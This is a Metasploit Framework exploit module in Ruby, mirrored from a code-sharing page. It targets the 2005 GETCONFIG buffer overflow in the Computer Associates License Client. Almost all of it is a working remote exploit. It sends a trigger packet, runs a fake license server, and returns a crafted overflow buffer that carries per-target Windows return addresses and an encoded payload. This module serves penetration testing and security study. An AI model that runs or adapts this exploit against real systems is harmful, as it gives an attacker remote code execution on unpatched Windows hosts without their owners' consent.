CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/license/calicclnt_getconfig.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'		=> 'Computer Associates License Client GETCONFIG Overflow',

14
      'Description'	=> %q{

15
          This module exploits a vulnerability in the CA License Client

16
        service. This exploit will only work if your IP address can be

17
        resolved from the target system point of view. This can be

18
        accomplished on a local network by running the 'nmbd' service

19
        that comes with Samba. If you are running this exploit from

20
        Windows and do not filter udp port 137, this should not be a

21
        problem (if the target is on the same network segment). Due to

22
        the bugginess of the software, you are only allowed one connection

23
        to the agent port before it starts ignoring you. If it wasn't for this

24
        issue, it would be possible to repeatedly exploit this bug.

25
      },

26
      'Author' =>

27
        [

28
          'hdm', # original msf v2 module

29
          'aushack', # msf v3 port :)

30
        ],

31
      'License' => MSF_LICENSE,

32
      'References'	=>

33
        [

34
          [ 'CVE', '2005-0581' ],

35
          [ 'OSVDB', '14389' ],

36
          [ 'BID', '12705' ],

37
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],

38
        ],

39
      'Privileged' => true,

40
      'DefaultOptions' =>

41
        {

42
          'EXITFUNC' => 'process',

43
        },

44
      'Payload' =>

45
        {

46
          'Space'	=> 600,

47
          'BadChars' => "\x00\x20",

48
          'StackAdjustment' => -3500,

49


50
        },

51
      'Platform'	=> 'win',

52
      'Targets' =>

53
        [

54
          # As much as I would like to return back to the DLL or EXE,

55
          # all of those modules have a leading NULL in the

56
          # loaded @ address :(

57
          # name, jmp esi, writable, jmp edi

58
          #['Automatic', {} ],

59
          #

60
          # aushack - tested OK Windows XP English SP0-1 only 20100214

61
          ['Windows 2000 English',	{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi

62
          ['Windows XP English SP0-1',	{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi

63
          ['Windows XP English SP2',	{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi

64
          ['Windows 2003 English SP0',	{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi

65
        ],

66
      'DisclosureDate' => '2005-03-02'))

67


68
    register_options(

69
      [

70
        Opt::RPORT(10203),

71
        OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]),

72
      ])

73
  end

74


75
  #def check

76
    # It is possible to check, but due to a software bug, checking prevents exploitation

77
  #end

78


79
  def exploit

80
    if (connect)

81
      sock.put("A0 GETSERVER<EOM>\n")

82
      print_status("Initial packet sent to remote agent...")

83
      disconnect

84


85
      fakecaservice = Rex::Socket::TcpServer.create(

86
        'LocalHost' => '0.0.0.0',

87
        'LocalPort' => datastore['SRVPORT'],

88
        'SSL'       => false,

89
        'Context'   =>

90
          {

91
            'Msf'        => framework,

92
            'MsfExploit' => self,

93
          })

94


95
      add_socket(fakecaservice)

96


97
      fakecaservice.start

98
      print_status("Waiting for the license agent to connect back...")

99
      begin

100
        Timeout.timeout(3) do

101
          done = false

102
          while (not done and session = fakecaservice.accept)

103
            print_status("Accepted connection from agent #{Rex::Socket.source_address(rhost)}..")

104
            session.put("A0 GETCONFIG SELF 0<EOM>")

105
            req = session.recvfrom(2000)[0]

106
            next if not req

107
            next if req.empty?

108


109
            if (req =~ /OS\<([^\>]+)/)

110
              print_status("Target reports OS: #{$1}")

111
            end

112


113
            # exploits two different versions at once >:-)

114
            # 144 -> return address of esi points to string middle

115
            # 196 -> return address of edi points to string beginning

116
            # 148 -> avoid exception by patching with writable address

117
            # 928 -> seh handler (not useful under XP SP2)

118
            buff = rand_text_alphanumeric(900)

119
            buff[142, 2] = Rex::Arch::X86.jmp_short(8) 		# jmp over addresses

120
            buff[144, 4] = [target['Rets'][0]].pack('V') 		# jmp esi

121
            buff[148, 4] = [target['Rets'][1]].pack('V')		# writable address

122
            buff[194, 2] = Rex::Arch::X86.jmp_short(4)		# jmp over address

123
            buff[196, 4] = [target['Rets'][2]].pack('V')		# jmp edi

124
            buff[272, payload.encoded.length] = payload.encoded

125


126
            sploit = "A0 GETCONFIG SELF #{buff}<EOM>"

127
            session.put(sploit)

128
            session.close

129
          end

130
        end

131
      ensure

132
        handler

133
        fakecaservice.close

134
        return

135
      end

136
    end

137
  end

138
end

139


140
=begin

141
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>

142
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>

143
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>

144
=end

145


146